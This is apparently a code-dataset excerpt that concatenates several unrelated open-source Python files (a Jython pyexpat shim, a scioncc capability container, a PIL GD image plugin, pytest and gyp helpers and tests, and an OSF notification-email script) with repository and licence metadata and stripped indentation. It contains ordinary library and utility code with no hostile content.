return self.Parse(file.read(), isfinal=True)
XMLParserType = XMLParser
def _encode(arg, encoding):
if isinstance(arg, unicode):
return arg.encode(encoding)
else:
if isinstance(arg, dict):
iterator = arg.iteritems()
else:
iterator = iter(arg)
return type(arg)(_encode(_arg, encoding) for _arg in iterator)
def expat(callback=None, guard=True, force=False, returns=None):
def _expat(method):
name = method.__name__
context = id(sys._getframe(1))
key = name, context
append = _register.setdefault(key, []).append
append((method, callback, guard, force, returns))
def new_method(*args):
self = args[0]
parser = self.parser
self._update_location(event=name) # bug if multiple method def
for (method, callback, guard, force, returns) in _register[key]:
if guard not in (True, False):
guard = getattr(self, guard)
_callback = callback and guard and \
getattr(parser, callback, None)
if _callback or force:
results = method(*args)
if _callback:
if not isinstance(results, tuple):
results = (results,)
if not parser.returns_unicode:
results = _encode(results, "utf-8")
_callback(*results)
return returns
new_method.__name__ = name
#new_method.__doc__ = method.__doc__ # what to do with multiple docs ?
return new_method
return _expat
class XMLEventHandler(DefaultHandler2):
def __init__(self, parser):
self.parser = parser
self._tags = {}
self.not_in_dtd = True
self._entity = {}
self._previous_event = None
# --- Helpers -------------------------------------------------------------
def _intern(self, tag):
return self._tags.setdefault(tag, tag)
def _qualify(self, local_name, qname, namespace=None):
namespace_separator = self.parser.namespace_separator
if namespace_separator is None:
return qname
if not namespace:
return local_name
else:
return namespace + namespace_separator + local_name
def _char_slice_to_unicode(self, characters, start, length):
"""Convert a char[] slice to a PyUnicode instance"""
text = Py.newUnicode(String(characters[start:start + length]))
return text
def _expat_content_model(self, name, model_):
# TODO : implement a model parser
return (name, model_) # does not fit expat conventions
def _update_location(self, event=None):
parser = self.parser
locator = self._locator
# ugly hack that takes care of a xerces-specific (?) locator issue:
# locate start and end elements at the '<' instead of the first tag
# type character.
if event == "startElement" and self._previous_event == "characters":
parser._NextColumnNumber = max(parser._NextColumnNumber - 1, 0)
if event == "endElement" and self._previous_event == "characters":
parser._NextColumnNumber = max(parser._NextColumnNumber - 2, 0)
# TODO: use the same trick to report accurate error locations ?
parser.CurrentLineNumber = parser._NextLineNumber
parser.CurrentColumnNumber = parser._NextColumnNumber
parser._NextLineNumber = locator.getLineNumber()
parser._NextColumnNumber = locator.getColumnNumber() - 1
self._previous_event = event
# --- ContentHandler Interface --------------------------------------------
@expat("ProcessingInstructionHandler")
def processingInstruction(self, target, data):
return target, data
@expat("StartElementHandler")
def startElement(self, namespace, local_name, qname, attributes):
tag = self._qualify(local_name, qname, namespace)
attribs = {}
length = attributes.getLength()
for index in range(length):
local_name = attributes.getLocalName(index)
qname = attributes.getQName(index)
namespace = attributes.getURI(index)
name = self._qualify(local_name, qname, namespace)
value = attributes.getValue(index)
attribs[name] = value
return self._intern(tag), attribs
@expat("EndElementHandler")
def endElement(self, namespace, local_name, qname):
return self._intern(self._qualify(local_name, qname, namespace))
@expat("CharacterDataHandler")
def characters(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("DefaultHandlerExpand")
def characters(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("DefaultHandler")
def characters(self, characters, start, length):
# TODO: make a helper function here
if self._entity["location"] == (self.parser.CurrentLineNumber,
self.parser.CurrentColumnNumber):
return "&%s;" % self._entity["name"]
else:
return self._char_slice_to_unicode(characters, start, length)
@expat("StartNamespaceDeclHandler")
def startPrefixMapping(self, prefix, uri):
return prefix, uri
@expat("EndNamespaceDeclHandler")
def endPrefixMapping(self, prefix):
return prefix
empty_source = InputSource(ByteArrayInputStream(array([], "b")))
@expat("ExternalEntityRefHandler", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
context = name # wrong. see expat headers documentation.
base = self.parser.GetBase()
return context, base, systemId, publicId
@expat("DefaultHandlerExpand", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
return "&%s;" % name
@expat("DefaultHandler", guard="not_in_dtd",
returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
return "&%s;" % name
@expat(force=True, returns=empty_source)
def resolveEntity(self, name, publicId, baseURI, systemId):
pass
def setDocumentLocator(self, locator):
self._locator = locator
def skippedEntity(self, name):
error = ExpatError()
error.lineno = self.ErrorLineNumber = self.parser._NextLineNumber
error.offset = self.ErrorColumnNumber = self.parser._NextColumnNumber
error.code = self.ErrorCode = None
message = "undefined entity &%s;: line %s, column %s"
message = message % (name, error.lineno, error.offset)
error.__init__(message)
raise error
# --- LexicalHandler Interface --------------------------------------------
@expat("CommentHandler")
def comment(self, characters, start, length):
return self._char_slice_to_unicode(characters, start, length)
@expat("StartCdataSectionHandler")
def startCDATA(self):
return ()
@expat("EndCdataSectionHandler")
def endCDATA(self):
return ()
@expat("StartDoctypeDeclHandler", force=True)
def startDTD(self, name, publicId, systemId):
self.not_in_dtd = False
has_internal_subset = 0 # don't know this ...
return name, systemId, publicId, has_internal_subset
@expat("EndDoctypeDeclHandler", force=True)
def endDTD(self):
self.not_in_dtd = True
def startEntity(self, name):
self._entity = {}
self._entity["location"] = (self.parser._NextLineNumber,
self.parser._NextColumnNumber)
self._entity["name"] = name
def endEntity(self, name):
pass
# --- DTDHandler Interface ------------------------------------------------
@expat("NotationDeclHandler")
def notationDecl(self, name, publicId, systemId):
base = self.parser.GetBase()
return name, base, systemId, publicId
@expat("UnparsedEntityDeclHandler") # deprecated
def unparsedEntityDecl(self, name, publicId, systemId, notationName):
base = self.parser.GetBase()
return name, base, systemId, publicId, notationName
# --- DeclHandler Interface -----------------------------------------------
@expat("AttlistDeclHandler")
def attributeDecl(self, eName, aName, type, mode, value):
# TODO: adapt mode, required, etc.
required = False
return eName, aName, type, value, required
@expat("ElementDeclHandler")
def elementDecl(self, name, model):
return self._expat_content_model(name, model)
@expat("EntityDeclHandler")
def externalEntityDecl(self, name, publicId, systemId):
base = self.parser.GetBase()
value = None
is_parameter_entity = None
notation_name = None
return (name, is_parameter_entity, value, base, systemId, publicId,
notation_name)
@expat("EntityDeclHandler")
def internalEntityDecl(self, name, value):
base = self.parser.GetBase()
is_parameter_entity = None
notation_name = None
systemId, publicId = None, None
return (name, is_parameter_entity, value, base, systemId, publicId,
notation_name)
def _init_model():
global model
model = types.ModuleType("pyexpat.model")
model.__doc__ = "Constants used to interpret content model information."
quantifiers = "NONE, OPT, REP, PLUS"
for i, quantifier in enumerate(quantifiers.split(", ")):
setattr(model, "XML_CQUANT_" + quantifier, i)
types_ = "EMPTY, ANY, MIXED, NAME, CHOICE, SEQ"
for i, type_ in enumerate(types_.split(", ")):
setattr(model, "XML_CTYPE_" + type_, i+1)
_init_model()
del _init_model
class ExpatError(Exception):
pass
error = ExpatError
def _init_error_strings():
global ErrorString
error_strings = (
None,
"out of memory",
"syntax error",
"no element found",
"not well-formed (invalid token)",
"unclosed token",
"partial character",
"mismatched tag",
"duplicate attribute",
"junk after document element",
"illegal parameter entity reference",
"undefined entity",
"recursive entity reference",
"asynchronous entity",
"reference to invalid character number",
"reference to binary entity",
"reference to external entity in attribute",
"XML or text declaration not at start of entity",
"unknown encoding",
"encoding specified in XML declaration is incorrect",
"unclosed CDATA section",
"error in processing external entity reference",
"document is not standalone",
"unexpected parser state - please send a bug report",
"entity declared in parameter entity",
"requested feature requires XML_DTD support in Expat",
"cannot change setting once parsing has begun",
"unbound prefix",
"must not undeclare prefix",
"incomplete markup in parameter entity",
"XML declaration not well-formed",
"text declaration not well-formed",
"illegal character(s) in public id",
"parser suspended",
"parser not suspended",
"parsing aborted",
"parsing finished",
"cannot suspend in external parameter entity")
def ErrorString(code):
try:
return error_strings[code]
except IndexError:
return None
_init_error_strings()
del _init_error_strings
def _init_errors():
global errors
errors = types.ModuleType("pyexpat.errors")
errors.__doc__ = "Constants used to describe error conditions."
error_names = """
XML_ERROR_NONE
XML_ERROR_NONE,
XML_ERROR_NO_MEMORY,
XML_ERROR_SYNTAX,
XML_ERROR_NO_ELEMENTS,
XML_ERROR_INVALID_TOKEN,
XML_ERROR_UNCLOSED_TOKEN,
XML_ERROR_PARTIAL_CHAR,
XML_ERROR_TAG_MISMATCH,
XML_ERROR_DUPLICATE_ATTRIBUTE,
XML_ERROR_JUNK_AFTER_DOC_ELEMENT,
XML_ERROR_PARAM_ENTITY_REF,
XML_ERROR_UNDEFINED_ENTITY,
XML_ERROR_RECURSIVE_ENTITY_REF,
XML_ERROR_ASYNC_ENTITY,
XML_ERROR_BAD_CHAR_REF,
XML_ERROR_BINARY_ENTITY_REF,
XML_ERROR_ATTRIBUTE_EXTERNAL_ENTITY_REF,
XML_ERROR_MISPLACED_XML_PI,
XML_ERROR_UNKNOWN_ENCODING,
XML_ERROR_INCORRECT_ENCODING,
XML_ERROR_UNCLOSED_CDATA_SECTION,
XML_ERROR_EXTERNAL_ENTITY_HANDLING,
XML_ERROR_NOT_STANDALONE,
XML_ERROR_UNEXPECTED_STATE,
XML_ERROR_ENTITY_DECLARED_IN_PE,
XML_ERROR_FEATURE_REQUIRES_XML_DTD,
XML_ERROR_CANT_CHANGE_FEATURE_ONCE_PARSING,
XML_ERROR_UNBOUND_PREFIX,
XML_ERROR_UNDECLARING_PREFIX,
XML_ERROR_INCOMPLETE_PE,
XML_ERROR_XML_DECL,
XML_ERROR_TEXT_DECL,
XML_ERROR_PUBLICID,
XML_ERROR_SUSPENDED,
XML_ERROR_NOT_SUSPENDED,
XML_ERROR_ABORTED,
XML_ERROR_FINISHED,
XML_ERROR_SUSPEND_PE
"""
error_names = [name.strip() for name in error_names.split(',')]
for i, name in enumerate(error_names[1:]):
setattr(errors, name, ErrorString(i+1))
_init_errors()
del _init_errors
| apache-2.0 |
crchemist/scioncc | src/pyon/container/cc.py | 2 | 18237 | #!/usr/bin/env python
"""Capability Container"""
__author__ = 'Adam R. Smith, Michael Meisinger, Dave Foster <dfoster@asascience.com>'
from pyon.container import ContainerCapability
from pyon.core import bootstrap
from pyon.core.bootstrap import CFG
from pyon.core.exception import ContainerError, BadRequest
from pyon.datastore.datastore import DataStore
from pyon.ion.event import EventPublisher
from pyon.ion.endpoint import ProcessRPCServer
from pyon.net.transport import LocalRouter
from pyon.util.config import Config
from pyon.util.containers import get_default_container_id, DotDict, named_any, dict_merge
from pyon.util.log import log
from pyon.util.context import LocalContextMixin
from pyon.util.greenlet_plugin import GreenletLeak
from pyon.util.file_sys import FileSystem
from interface.objects import ContainerStateEnum
from interface.services.icontainer_agent import BaseContainerAgent
import atexit
import msgpack
import os
import signal
import traceback
import sys
import gevent
from contextlib import contextmanager
# Capability constants for use in:
# if self.container.has_capability(CCAP.RESOURCE_REGISTRY):
CCAP = DotDict()
# Container status
INIT = "INIT"
RUNNING = "RUNNING"
TERMINATING = "TERMINATING"
TERMINATED = "TERMINATED"
class Container(BaseContainerAgent):
"""
The Capability Container. Its purpose is to spawn/monitor processes and services
that do the bulk of the work in the ION system. It also manages connections to the Exchange
and the various forms of datastores in the systems.
"""
# Singleton static variables
#node = None
id = None
name = None
pidfile = None
instance = None
def __init__(self, *args, **kwargs):
BaseContainerAgent.__init__(self, *args, **kwargs)
# Coordinates the container start
self._status = INIT
self._is_started = False
# set container id and cc_agent name (as they are set in base class call)
self.id = get_default_container_id()
self.name = "cc_agent_%s" % self.id
bootstrap.container_instance = self
Container.instance = self
self.container = self # Make self appear as process to service clients
self.CCAP = CCAP
self.CFG = CFG
log.debug("Container (sysname=%s) initializing ..." % bootstrap.get_sys_name())
# Keep track of the overrides from the command-line, so they can trump app/rel file data
self.spawn_args = kwargs
# Greenlet context-local storage
self.context = LocalContextMixin()
# Load general capabilities file and augment with specific profile
self._load_capabilities()
# Start the capabilities
start_order = self.cap_profile['start_order']
for cap in start_order:
if cap not in self._cap_definitions:
raise ContainerError("CC capability %s not defined in profile" % cap)
if cap in self._capabilities or cap in self._cap_instances:
raise ContainerError("CC capability %s already initialized" % cap)
try:
cap_def = self._cap_definitions[cap]
log.debug("__init__(): Initializing '%s'" % cap)
cap_obj = named_any(cap_def['class'])(container=self)
self._cap_instances[cap] = cap_obj
if 'depends_on' in cap_def and cap_def['depends_on']:
dep_list = cap_def['depends_on'].split(',')
for dep in dep_list:
dep = dep.strip()
if dep not in self._cap_initialized:
raise ContainerError("CC capability %s dependent on non-existing capability %s" % (cap, dep))
if 'field' in cap_def and cap_def['field']:
setattr(self, cap_def['field'], cap_obj)
self._cap_initialized.append(cap)
except Exception as ex:
log.error("Container Capability %s init error: %s" % (cap, ex))
raise
log.debug("Container initialized, OK.")
def _load_capabilities(self):
self._cap_initialized = [] # List of capability constants initialized in container
self._capabilities = [] # List of capability constants active in container
self._cap_instances = {} # Dict mapping capability->manager instance
self._cap_definitions = Config(["res/config/container_capabilities.yml"]).data['capabilities']
profile_filename = CFG.get_safe("container.profile", "development")
if not profile_filename.endswith(".yml"):
profile_filename = "res/profile/%s.yml" % profile_filename
log.debug("Loading CC capability profile from file: %s", profile_filename)
profile_cfg = Config([profile_filename]).data
if not isinstance(profile_cfg, dict) or profile_cfg['type'] != "profile" or not "profile" in profile_cfg:
raise ContainerError("Container capability profile invalid: %s" % profile_filename)
self.cap_profile = profile_cfg['profile']
if "capabilities" in self.cap_profile and self.cap_profile['capabilities']:
dict_merge(self._cap_definitions, self.cap_profile['capabilities'], True)
CCAP.clear()
cap_list = self._cap_definitions.keys()
CCAP.update(zip(cap_list, cap_list))
if "config" in self.cap_profile and self.cap_profile['config']:
log.info("Container CFG was changed based on profile: %s", profile_filename)
# Note: The config update actually happens in pycc.py early on
def start(self):
log.debug("Container starting...")
if self._is_started:
raise ContainerError("Container already started")
start_order = self.cap_profile['start_order']
for cap in start_order:
if cap not in self._cap_instances:
continue
# First find the default enabled value if no CFG key exists
enabled_default = self._cap_definitions.get_safe("%s.enabled_default" % cap, True)
# Then find CFG key where enabled flag is (default or override)
enabled_config = self._cap_definitions.get_safe("%s.enabled_config" % cap, "container.%s.enabled" % cap)
# Then determine the enabled value
enabled = CFG.get_safe(enabled_config, enabled_default)
if enabled:
log.debug("start(): Starting '%s'" % cap)
try:
cap_obj = self._cap_instances[cap]
cap_obj.start()
self._capabilities.append(cap)
except Exception as ex:
log.error("Container Capability %s start error: %s" % (cap, ex))
raise
else:
log.debug("start(): Capability '%s' disabled by config '%s'", cap, enabled_config)
if self.has_capability(CCAP.EVENT_PUBLISHER):
self.event_pub.publish_event(event_type="ContainerLifecycleEvent",
origin=self.id, origin_type="CapabilityContainer",
sub_type="START",
state=ContainerStateEnum.START)
self._is_started = True
self._status = RUNNING
log.info("Container (%s) started, OK.", self.id)
def has_capability(self, capability):
"""
Returns True if the given capability is in the list of container capabilities,
i.e. available in this container.
"""
return capability in self._capabilities
@property
def node(self):
"""
Returns the active/default Node that should be used for most communication in the system.
Defers to exchange manager, but only if it has been started, otherwise returns None.
"""
if self.has_capability(CCAP.EXCHANGE_MANAGER):
return self.ex_manager.default_node
return None
@contextmanager
def _push_status(self, new_status):
"""
Temporarily sets the internal status flag.
Use this as a decorator or in a with-statement before calling a temporary status changing
method, like start_rel_from_url.
"""
curstatus = self._status
self._status = new_status
try:
yield
finally:
self._status = curstatus
def serve_forever(self):
""" Run the container until killed. """
log.debug("In Container.serve_forever")
if not self.proc_manager.proc_sup.running:
self.start()
# Exit if immediate==True and children len is ok
num_procs = len(self.proc_manager.proc_sup.children)
immediate = CFG.system.get('immediate', False)
if immediate and num_procs == 1: # only spawned greenlet is the CC-Agent
log.debug("Container.serve_forever exiting due to CFG.system.immediate")
else:
# print a warning just in case
if immediate and num_procs != 1:
log.warn("CFG.system.immediate=True but number of spawned processes is not 1 (%d)", num_procs)
try:
# This just waits in this Greenlet for all child processes to complete,
# which is triggered somewhere else.
self.proc_manager.proc_sup.join_children()
except (KeyboardInterrupt, SystemExit) as ex:
if hasattr(self, 'gl_parent_watch') and self.gl_parent_watch is not None:
# Remove the greenlet that watches the parent process
self.gl_parent_watch.kill()
# Let the caller handle this
raise
except:
log.exception('Unhandled error! Forcing container shutdown')
def status(self):
"""
Returns the internal status.
"""
return self._status
def is_running(self):
"""
Is the container in the process of shutting down or stopped.
"""
if self._status == RUNNING:
return True
return False
def is_terminating(self):
"""
Is the container in the process of shutting down or stopped.
"""
if self._status == TERMINATING or self._status == TERMINATED:
return True
return False
def _cleanup_pid(self):
if self.pidfile:
log.debug("Cleanup pidfile: %s", self.pidfile)
try:
os.remove(self.pidfile)
except Exception as e:
log.warn("Pidfile could not be deleted: %s" % str(e))
self.pidfile = None
def stop(self):
log.info("=============== Container stopping... ===============")
self._status = TERMINATING
if self.has_capability(CCAP.EVENT_PUBLISHER) and self.event_pub is not None:
try:
self.event_pub.publish_event(event_type="ContainerLifecycleEvent",
origin=self.id, origin_type="CapabilityContainer",
sub_type="TERMINATE",
state=ContainerStateEnum.TERMINATE)
except Exception as ex:
log.exception(ex)
while self._capabilities:
capability = self._capabilities.pop()
#log.debug("stop(): Stopping '%s'" % capability)
try:
cap_obj = self._cap_instances[capability]
cap_obj.stop()
del self._cap_instances[capability]
except Exception as ex:
log.exception("Container stop(): Error stop %s" % capability)
Container.instance = None
from pyon.core import bootstrap
bootstrap.container_instance = None
self._is_started = False
self._status = TERMINATED
log.info("Container stopped.")
def start_app(self, appdef=None, config=None):
with self._push_status("START_APP"):
return self.app_manager.start_app(appdef=appdef, config=config)
def start_app_from_url(self, app_url=''):
with self._push_status("START_APP_FROM_URL"):
return self.app_manager.start_app_from_url(app_url=app_url)
def start_rel(self, rel=None):
with self._push_status("START_REL"):
return self.app_manager.start_rel(rel=rel)
def start_rel_from_url(self, rel_url='', config=None):
with self._push_status("START_REL_FROM_URL"):
return self.app_manager.start_rel_from_url(rel_url=rel_url, config=config)
def fail_fast(self, err_msg="", skip_stop=False):
"""
Container needs to shut down and NOW.
"""
log.error("Fail Fast: %s", err_msg)
if not skip_stop:
self.stop()
log.error("Fail Fast: killing container")
traceback.print_exc()
self._kill_fast()
def _kill_fast(self):
# The exit code of the terminated process is set to non-zero
os.kill(os.getpid(), signal.SIGTERM)
class PidfileCapability(ContainerCapability):
def start(self):
# Check if this UNIX process already runs a Container.
self.container.pidfile = "cc-pid-%d" % os.getpid()
if os.path.exists(self.container.pidfile):
raise ContainerError("Container.on_start(): Container is a singleton per UNIX process. Existing pid file found: %s" % self.container.pidfile)
# write out a PID file containing our agent messaging name
with open(self.container.pidfile, 'w') as f:
pid_contents = {'messaging': dict(CFG.server.amqp),
'container-agent': self.container.name,
'container-xp': bootstrap.get_sys_name()}
f.write(msgpack.dumps(pid_contents))
atexit.register(self.container._cleanup_pid)
def stop(self):
self.container._cleanup_pid()
class SignalHandlerCapability(ContainerCapability):
def start(self):
def handle_sigterm():
"""Handles SIGTERM, initiating orderly Python exit handling,
allowing the container to shutdown.
Notes:
- Without this handler, the process is immediately terminated on SIGTERM
- Gevent has signal handling, so must use gevent version or chain
"""
try:
log.info("In TERM signal handler, triggering exit")
self.container._cleanup_pid() # cleanup the pidfile first
finally:
# This will raise SystemExit in serve_forever and IPython cores
# Thereby pycc will be able to shutdown the container
sys.exit(signal.SIGTERM)
# Set up SIGTERM handler
gevent.signal(signal.SIGTERM, handle_sigterm)
def handle_sigusr2():
"""Handles SIGUSR2, prints debugging greenlet information.
"""
gls = GreenletLeak.get_greenlets()
allgls = []
for gl in gls:
status = GreenletLeak.format_greenlet(gl)
# build formatted output:
# Greenlet at 0xdeadbeef
# self: <EndpointUnit at 0x1ffcceef>
# func: bound, EndpointUnit.some_func
status[0].insert(0, "%s at %s:" % (gl.__class__.__name__, hex(id(gl))))
# indent anything in status a second time
prefmt = [s.replace("\t", "\t\t") for s in status[0]]
prefmt.append("traceback:")
for line in status[1]:
for subline in line.split("\n")[0:2]:
prefmt.append(subline)
glstr = "\n\t".join(prefmt)
allgls.append(glstr)
# print it out!
print >>sys.stderr, "\n\n".join(allgls)
with open("gls-%s" % os.getpid(), "w") as f:
f.write("\n\n".join(allgls))
# Set up greenlet debugging signal handler
gevent.signal(signal.SIGUSR2, handle_sigusr2)
class EventPublisherCapability(ContainerCapability):
def __init__(self, container):
ContainerCapability.__init__(self, container)
self.container.event_pub = None
def start(self):
self.container.event_pub = EventPublisher()
def stop(self):
self.container.event_pub.close()
class ObjectStoreCapability(ContainerCapability):
def __init__(self, container):
ContainerCapability.__init__(self, container)
self.container.object_store = None
def start(self):
from pyon.ion.objstore import ObjectStore
self.container.object_store = ObjectStore()
def stop(self):
self.container.object_store.close()
self.container.object_store = None
class LocalRouterCapability(ContainerCapability):
def __init__(self, container):
ContainerCapability.__init__(self, container)
self.container.local_router = None
def start(self):
# internal router for local transports
self.container.local_router = LocalRouter(bootstrap.get_sys_name())
self.container.local_router.start()
self.container.local_router.ready.wait(timeout=2)
def stop(self):
self.container.local_router.stop()
class ContainerAgentCapability(ContainerCapability):
def start(self):
# Start the CC-Agent API
listen_name = self.container.create_xn_process(self.container.name)
rsvc = ProcessRPCServer(from_name=listen_name, service=self.container, process=self.container)
# Start an ION process with the right kind of endpoint factory
proc = self.container.proc_manager.proc_sup.spawn(name=self.container.name, listeners=[rsvc], service=self.container)
self.container.proc_manager.proc_sup.ensure_ready(proc)
proc.start_listeners()
def stop(self):
pass
class FileSystemCapability(ContainerCapability):
def __init__(self, container):
ContainerCapability.__init__(self, container)
self.container.file_system = FileSystem(CFG)
| bsd-2-clause |
KAMI911/loec | examples/Sharpen/binaries-windows-python26/GdImageFile.py | 3 | 2265 | #
# The Python Imaging Library.
# $Id: GdImageFile.py 2134 2004-10-06 08:55:20Z fredrik $
#
# GD file handling
#
# History:
# 1996-04-12 fl Created
#
# Copyright (c) 1997 by Secret Labs AB.
# Copyright (c) 1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the
# class is not registered for use with Image.open(). To open a
# gd file, use the GdImageFile.open() function instead.
# THE GD FORMAT IS NOT DESIGNED FOR DATA INTERCHANGE. This
# implementation is provided for convenience and demonstrational
# purposes only.
__version__ = "0.1"
import string
import Image, ImageFile, ImagePalette
def i16(c):
return ord(c[1]) + (ord(c[0])<<8)
##
# Image plugin for the GD uncompressed format. Note that this format
# is not supported by the standard <b>Image.open</b> function. To use
# this plugin, you have to import the <b>GdImageFile</b> module and
# use the <b>GdImageFile.open</b> function.
class GdImageFile(ImageFile.ImageFile):
format = "GD"
format_description = "GD uncompressed images"
def _open(self):
# Header
s = self.fp.read(775)
self.mode = "L" # FIXME: "P"
self.size = i16(s[0:2]), i16(s[2:4])
# transparency index
tindex = i16(s[5:7])
if tindex < 256:
self.info["transparent"] = tindex
self.palette = ImagePalette.raw("RGB", s[7:])
self.tile = [("raw", (0,0)+self.size, 775, ("L", 0, -1))]
##
# Load texture from a GD image file.
#
# @param filename GD file name, or an opened file handle.
# @param mode Optional mode. In this version, if the mode argument
# is given, it must be "r".
# @return An image instance.
# @exception IOError If the image could not be read.
def open(fp, mode = "r"):
if mode != "r":
raise ValueError("bad mode")
if type(fp) == type(""):
import __builtin__
filename = fp
fp = __builtin__.open(fp, "rb")
else:
filename = ""
try:
return GdImageFile(fp, filename)
except SyntaxError:
raise IOError("cannot identify this image file")
| gpl-3.0 |
rmfitzpatrick/pytest | _pytest/nodes.py | 38 | 1211 | SEP = "/"
def _splitnode(nodeid):
"""Split a nodeid into constituent 'parts'.
Node IDs are strings, and can be things like:
''
'testing/code'
'testing/code/test_excinfo.py'
'testing/code/test_excinfo.py::TestFormattedExcinfo::()'
Return values are lists e.g.
[]
['testing', 'code']
['testing', 'code', 'test_excinfo.py']
['testing', 'code', 'test_excinfo.py', 'TestFormattedExcinfo', '()']
"""
if nodeid == '':
# If there is no root node at all, return an empty list so the caller's logic can remain sane
return []
parts = nodeid.split(SEP)
# Replace single last element 'test_foo.py::Bar::()' with multiple elements 'test_foo.py', 'Bar', '()'
parts[-1:] = parts[-1].split("::")
return parts
def ischildnode(baseid, nodeid):
"""Return True if the nodeid is a child node of the baseid.
E.g. 'foo/bar::Baz::()' is a child of 'foo', 'foo/bar' and 'foo/bar::Baz', but not of 'foo/blorp'
"""
base_parts = _splitnode(baseid)
node_parts = _splitnode(nodeid)
if len(node_parts) < len(base_parts):
return False
return node_parts[:len(base_parts)] == base_parts
| mit |
al1221/ghost-openshift | core/client/node_modules/ember-cli/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common_test.py | 2542 | 1970 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the common.py file."""
import gyp.common
import unittest
import sys
class TestTopologicallySorted(unittest.TestCase):
def test_Valid(self):
"""Test that sorting works on a valid graph with one possible order."""
graph = {
'a': ['b', 'c'],
'b': [],
'c': ['d'],
'd': ['b'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertEqual(
gyp.common.TopologicallySorted(graph.keys(), GetEdge),
['a', 'c', 'd', 'b'])
def test_Cycle(self):
"""Test that an exception is thrown on a cyclic graph."""
graph = {
'a': ['b'],
'b': ['c'],
'c': ['d'],
'd': ['a'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertRaises(
gyp.common.CycleError, gyp.common.TopologicallySorted,
graph.keys(), GetEdge)
class TestGetFlavor(unittest.TestCase):
"""Test that gyp.common.GetFlavor works as intended"""
original_platform = ''
def setUp(self):
self.original_platform = sys.platform
def tearDown(self):
sys.platform = self.original_platform
def assertFlavor(self, expected, argument, param):
sys.platform = argument
self.assertEqual(expected, gyp.common.GetFlavor(param))
def test_platform_default(self):
self.assertFlavor('freebsd', 'freebsd9' , {})
self.assertFlavor('freebsd', 'freebsd10', {})
self.assertFlavor('openbsd', 'openbsd5' , {})
self.assertFlavor('solaris', 'sunos5' , {});
self.assertFlavor('solaris', 'sunos' , {});
self.assertFlavor('linux' , 'linux2' , {});
self.assertFlavor('linux' , 'linux3' , {});
def test_param(self):
self.assertFlavor('foobar', 'linux2' , {'flavor': 'foobar'})
if __name__ == '__main__':
unittest.main()
| mit |
hmoco/osf.io | scripts/admin_permission_email.py | 9 | 3429 | #!/usr/bin/env python
# encoding: utf-8
import logging
import datetime
from django.utils import timezone
from modularodm import Q
from framework.email.tasks import send_email
from website import mails
from website import models
from website import settings
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
FROM_ADDR = 'OSF Support <support@osf.io>'
MESSAGE_NAME = 'permissions_change'
SECURITY_MESSAGE = mails.Mail(
'security_permissions_change',
subject='OSF Privacy Notice',
)
def send_security_message(user, label, mail):
if label in user.security_messages:
return
# Pass mailer so that celery is not used
# Email synchronously so that user is only saved after email has been sent
mails.send_mail(
user.username,
mail,
from_addr=FROM_ADDR,
mailer=send_email,
user=user,
username=settings.MANDRILL_USERNAME,
password=settings.MANDRILL_PASSWORD,
mail_server=settings.MANDRILL_MAIL_SERVER,
)
user.security_messages[label] = timezone.now()
user.save()
def get_targets():
# Active users who have not received the email
query = (
Q('security_messages.{0}'.format(MESSAGE_NAME), 'exists', False) &
Q('is_registered', 'eq', True) &
Q('password', 'ne', None) &
Q('is_merged', 'ne', True) &
Q('is_disabled', 'ne', True) &
Q('date_confirmed', 'ne', None)
)
return models.User.find(query)
def main(dry_run):
users = get_targets()
for user in users:
logger.info('Sending message to user {0!r}'.format(user))
if not dry_run:
send_security_message(user, MESSAGE_NAME, SECURITY_MESSAGE)
if __name__ == '__main__':
import sys
script_utils.add_file_logger(logger, __file__)
dry_run = 'dry' in sys.argv
init_app(set_backends=True, routes=False)
main(dry_run=dry_run)
import mock
from nose.tools import * # noqa
from tests.base import OsfTestCase
from tests.factories import UserFactory
class TestSendSecurityMessage(OsfTestCase):
def tearDown(self):
super(TestSendSecurityMessage, self).tearDown()
models.User.remove()
def test_get_targets(self):
users = [UserFactory() for _ in range(3)]
users[0].security_messages[MESSAGE_NAME] = timezone.now()
users[0].save()
targets = get_targets()
assert_equal(set(targets), set(users[1:]))
@mock.patch('scripts.admin_permission_email.send_email')
def test_send_mail(self, mock_send_mail):
user = UserFactory()
send_security_message(user, MESSAGE_NAME, SECURITY_MESSAGE)
user.reload()
assert_in(MESSAGE_NAME, user.security_messages)
@mock.patch('scripts.admin_permission_email.send_email')
def test_main(self, mock_send_mail):
[UserFactory() for _ in range(3)]
assert_equal(len(get_targets()), 3)
main(dry_run=False)
assert_true(mock_send_mail.called)
assert_equal(len(get_targets()), 0)
@mock.patch('scripts.admin_permission_email.send_email')
def test_main_dry(self, mock_send_mail):
[UserFactory() for _ in range(3)]
assert_equal(len(get_targets()), 3)
main(dry_run=True)
assert_false(mock_send_mail.called)
assert_equal(len(get_targets()), 3)
| apache-2.0 |
masterpowers/angular-laravel | node_modules/laravel-elixir/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/input.py | 457 | 112827 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from compiler.ast import Const
from compiler.ast import Dict
from compiler.ast import Discard
from compiler.ast import List
from compiler.ast import Module
from compiler.ast import Node
from compiler.ast import Stmt
import compiler
import copy
import gyp.common
import multiprocessing
import optparse
import os.path
import re
import shlex
import signal
import subprocess
import sys
import threading
import time
import traceback
from gyp.common import GypError
# A list of types that are treated as linkable.
linkable_types = ['executable', 'shared_library', 'loadable_module']
# A list of sections that contain links to other targets.
dependency_sections = ['dependencies', 'export_dependent_settings']
# base_path_sections is a list of sections defined by GYP that contain
# pathnames. The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
'destination',
'files',
'include_dirs',
'inputs',
'libraries',
'outputs',
'sources',
]
path_sections = []
is_path_section_charset = set('=+?!')
